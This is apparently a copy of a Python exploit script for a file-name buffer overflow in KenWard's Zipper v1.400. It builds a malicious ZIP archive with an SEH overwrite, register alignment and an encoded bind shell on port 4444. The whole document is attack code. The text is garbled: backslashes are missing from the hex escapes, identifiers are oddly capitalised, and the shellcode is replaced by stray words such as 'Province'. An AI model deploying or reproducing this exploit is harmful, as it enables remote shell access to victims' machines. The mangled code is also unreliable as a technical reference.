KenWard & amp; #39; s Zipper v1.400 Buffer Overflow-Meth

#! /Usr/bin/python

# KenWards Zipper v1.400 File Name Buffer Overflow

# Coded by sinn3r (x90.sinner {at} gmail {d0t} com)

# Tested on: Windows XP SP3 ENG

# Reference: http://www.exploit-db.com/exploits/11834

# Big thanks to mr_me, and corelanc0d3r.

# Greetz to all the friends at Corelan Scurity Team & Exploit-DB... coolest people ever!

##

# Description:

# This exploit takes advantage of the fact too character characters get mangled, as a result

# I was able to get a shell in a more straight forward way. Very interesting exercise.

# Mr_me and tecR0c figured out this trick, of course. But I was given the honor to share it.

# Script provided as is, without any warranty.

# Use for educational purposes only. Do not use this code to do anything illegal.

# Zip file format based on:

# Http://en.wikipedia.org/wiki/ZIP_ (file_format)

Local_file_header = (

"X50x4Bx03x04" # Local file header signature

"X00x02" # Version needed to extract

"X00x08" # General purpose bit flag

"X00xDA" # Compression method

"XA2x48" # File last modification time

"X3BxF6" # File last modification date

"X66x18x0Dx4E" # CRC-32

"XEFx0Fx00x00" # Compressed size (payload size)

"X14x00x00x00" # Uncompressed size

"Xe4x4f" # File name length

"X04x00" # Extra field length

# "X73x65x63x72x65x74x73" # File name (n) ASCII "secrets"

# "X42x42x42x42" # Extra field (m)

);

Central_directory_file_header = (

"X50x4bx01x02" # Central directory file header signature

"X14x00" # Version made

"X14x00" # Version needed to extract

"X00x08" # General purpose bit flag

"X00xDA" # Compression method

"XA2x48" # File last modification time

"X3BxF6" # File last modification date

"X66x18x0Dx4E" # CRC-32

"XE4x0Fx00x00" # Compressed size (payload size)

"X14x00x00x00" # Uncompressed size

"Xe4x0f" # File name length (n)

"X04x00" # Extra field length (m)

"X04x00" # File comment length

"X00x01" # Disk number where file starts

"X00x00" # Internal file attributes

"X20x00x00x00" # External file attributes

"X00x00x00x00" # Relative offset of local file header

# "X73x65x63x72x65x74x73" # File name (n) ASCII "secrets"

# "X42x42x42x42" # Extra field (m)

# "X43x43x43x43" # File comment (k)

);

End_of_central_directory_record = (

"X50x4Bx05x06" # End of central directory signature

"X00x00" # Number of this disk

"X00x00" # Disk where central directory starts

"X01x00" # Number of central directory records on this disk

"X01x00" # Total number of central directory records

"X12x10x00x00" # Size of central directory (central directory size + payload)

"X02x10x00x00" # Offset of start of central directory, relative to start of archive (lfh + payload)

"X00x00" # Zip file comment length (n)

);

# Align EAX for the base address of the alpha2 encoded bindshell

AlignEAX = (

"X05x10x7Ex10x7E" # add eax, 0x7e0000e10

"X05x09x75x01x7E" # add eax, 0x7E017509

"X05x02x03x01x04" # add eax, 0x04010302

"X72x07" + # JB jump over the bytes we cant overwrite

"X41" * 12 # NOPs

);

# Windows/shell_bind_tcp lport = 4444 exitfunc = seh

# Alpha2 eax -- uppercase 744 bytes

Shellcode = ("response"

"Province"

"Province"

"Province"

"Province"

"Province"

"Province"

"Province"

"Success ")

#4064 + 4 bytes

# Pointer to next SEH record: 1022 bytes

# SE handler: 1026 bytes

Payload = (

"X41" * (1017-len (alignEAX)-len (shellcode) + # Padding

AlignEAX + # Align EAX for the bindshell

Shellcode + # Bindshell lport 4444

"X82x85x81x98x98" # This will get mangled and become "xE9xE0xFCxFFxFF"

"X73x97x42x42" # JNB 0x97 = JNB 0xF9 = Same as EB 0xFB = Rewind 5 bytes

"X7Ex27x41x00" + # pop ret = 0x0041277E

"X44" * 3034 + # Padding

". Bin" # Fake name

);

# Create the ZIP structure with our payload

Zip = (

Local_file_header +

Payload +

Central_directory_file_header +

Payload +

End_of_central_directory_record

);